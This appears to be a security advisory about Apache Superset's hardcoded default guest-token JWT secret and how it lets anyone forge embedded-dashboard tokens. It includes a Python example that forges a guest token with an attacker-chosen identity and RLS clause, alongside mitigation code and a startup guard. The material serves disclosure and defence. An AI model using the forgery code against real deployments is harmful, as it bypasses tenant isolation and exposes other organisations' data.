Hardcoded Superset Secret Leaves Embedded Dashboards Vulnerable to Guest Token Forgery
A security gap in Apache Superset's default configuration exposes embedded dashboards to token forgery attacks. The file `superset/config.py` ships with `GUEST_TOKEN_JWT_SECRET` hardcoded to `"test-guest-secret-change-me"`, a publicly documented default that anyone can read from the source code. Superset's own `SECRET_KEY` is checked at startup against `KNOWN_INSECURE_SECRET_KEYS`, and the application refuses to run when that value is left at a known default; the guest token secret has no equivalent startup guard. Any Superset deployment that enables the `EMBEDDED_SUPERSET` or `EMBEDDED_DASHBOARD` feature flag without explicitly overriding this value is signing guest JWTs with a secret that is committed to a public repository and therefore known to every attacker.
The vulnerability stems from the token minting and parsing logic in `superset/security/manager.py`, specifically the `create_guest_access_token` and `parse_jwt_guest_token` methods of the security manager. Guest tokens are HMAC-signed JWTs, and these routines rely entirely on the configured secret for signature verification: whoever holds the key can mint tokens that pass every check. An attacker who identifies an exposed embedded dashboard can craft a guest token containing arbitrary user identity claims and attacker-controlled Row-Level Security (RLS) clauses. Because the signing key is known in advance, the forged token verifies cleanly, and the RLS clauses it carries replace the tenant isolation that RLS policies were supposed to enforce. The token's audience and short expiry claims do not help here; they constrain only tokens an attacker cannot sign. This is not a theoretical attack surface: the default exists in production builds for any organization that failed to audit the configuration during deployment.
The severity escalates to critical for multi-tenant environments where embedded dashboards serve external users or partners. Organizations relying on RLS to enforce data segmentation risk cross-tenant data exposure through a single forged guest token. The mitigation is immediate and cheap: generate a cryptographically strong random secret (for example with `openssl rand -base64 42`, the same recipe Superset documents for `SECRET_KEY`) and set `GUEST_TOKEN_JWT_SECRET` explicitly via an environment variable or a `superset_config.py` override; any token signed with the old default stops verifying the moment the new secret is loaded. Until upstream adds a startup guard that flags this known-insecure default, the gap leaves even security-conscious deployments exposed if they neglect a manual configuration audit, so the check is worth adding to your own deployment tooling.
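The following is an added example written for this page, not Superset's own code, covering both the forgery path described above and the mitigation. It implements HS256 JWT signing and verification with the standard library so it runs offline, mints a guest token with an attacker-chosen username and RLS clause under the shipped default secret, shows that a verifier still using that default accepts it while one configured with a fresh random secret rejects it, and includes a hypothetical startup guard modelled on the `KNOWN_INSECURE_SECRET_KEYS` check. The claim layout (`type`, `user`, `resources`, `rls_rules`, `aud`, `iat`, `exp`), the audience string, the dashboard id and the RLS clause are assumptions chosen for illustration.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time

# The shipped default quoted in the text. Everything else in this file is an
# illustration written for this page, not Superset's own code; the claim
# layout, audience value and dashboard id below are assumed.
DEFAULT_GUEST_SECRET = "test-guest-secret-change-me"
KNOWN_INSECURE_GUEST_SECRETS = {DEFAULT_GUEST_SECRET}
GUEST_TOKEN_AUDIENCE = "superset"   # assumed audience for this example
GUEST_TOKEN_EXP_SECONDS = 300       # short lifetime; irrelevant once the key is known


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, secret: str) -> str:
    """Compact JWS: base64url(header).base64url(payload).base64url(HMAC-SHA256)."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        _b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + _b64url(json.dumps(claims, separators=(",", ":")).encode())
    )
    tag = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(tag)


def verify_guest_token(token: str, secret: str, audience: str, now=None) -> dict:
    """Check signature, alg, audience, expiry and token type the way a resource
    server would. Raises ValueError on any failure, returns the claims otherwise."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    head, body, sig = parts
    expected = hmac.new(secret.encode(), f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig)):
        raise ValueError("bad signature")
    if json.loads(_b64url_decode(head)).get("alg") != "HS256":
        raise ValueError("unexpected alg")   # never let the token choose the algorithm
    claims = json.loads(_b64url_decode(body))
    now = time.time() if now is None else now
    if claims.get("aud") != audience:
        raise ValueError("bad audience")
    if claims.get("exp", 0) <= now:
        raise ValueError("expired")
    if claims.get("type") != "guest":
        raise ValueError("not a guest token")
    return claims


def forge_guest_token(secret: str, username: str, dashboard_id: str, rls_clause: str, now=None) -> str:
    """Mint a guest token carrying an attacker-chosen identity and RLS clause.
    With the shipped default secret, this is all an attacker needs."""
    now = int(time.time()) if now is None else int(now)
    claims = {
        "type": "guest",
        "user": {"username": username},
        "resources": [{"type": "dashboard", "id": dashboard_id}],
        "rls_rules": [{"clause": rls_clause}],
        "aud": GUEST_TOKEN_AUDIENCE,
        "iat": now,
        "exp": now + GUEST_TOKEN_EXP_SECONDS,
    }
    return sign_hs256(claims, secret)


def check_guest_token_secret(secret: str) -> None:
    """Hypothetical startup guard in the spirit of the KNOWN_INSECURE_SECRET_KEYS
    check that Superset applies to SECRET_KEY; Superset does not ship this."""
    if secret in KNOWN_INSECURE_GUEST_SECRETS:
        raise RuntimeError("GUEST_TOKEN_JWT_SECRET is the shipped default; set a real secret")
    if len(secret) < 32:
        raise RuntimeError("GUEST_TOKEN_JWT_SECRET is too short to resist brute force")


def generate_guest_token_secret() -> str:
    """A value suitable for GUEST_TOKEN_JWT_SECRET: 64 URL-safe chars, 384 random bits."""
    return secrets.token_urlsafe(48)


def demo():
    # Constructed values: a made-up dashboard id and an RLS clause that selects
    # another tenant's rows instead of the one the embedding host intended.
    forged = forge_guest_token(DEFAULT_GUEST_SECRET, "attacker", "dash-uuid", "tenant_id = 42")
    # A server still on the default accepts the token and applies the attacker's clause.
    accepted = verify_guest_token(forged, DEFAULT_GUEST_SECRET, GUEST_TOKEN_AUDIENCE)
    # A server with its own random secret rejects the identical token.
    try:
        verify_guest_token(forged, generate_guest_token_secret(), GUEST_TOKEN_AUDIENCE)
        rejected = False
    except ValueError:
        rejected = True
    return accepted["rls_rules"][0]["clause"], rejected
```

`demo()` returns the clause the default-configured verifier accepted together with `True` for the rejection under a fresh secret. In a real deployment the guard would run where the rest of the configuration is validated, but the fix itself is just the override: something like `GUEST_TOKEN_JWT_SECRET = os.environ["GUEST_TOKEN_JWT_SECRET"]` in `superset_config.py` (where you keep overrides is an assumption here), with the value produced once by `generate_guest_token_secret()` or `openssl rand -base64 42` and stored in your secret manager.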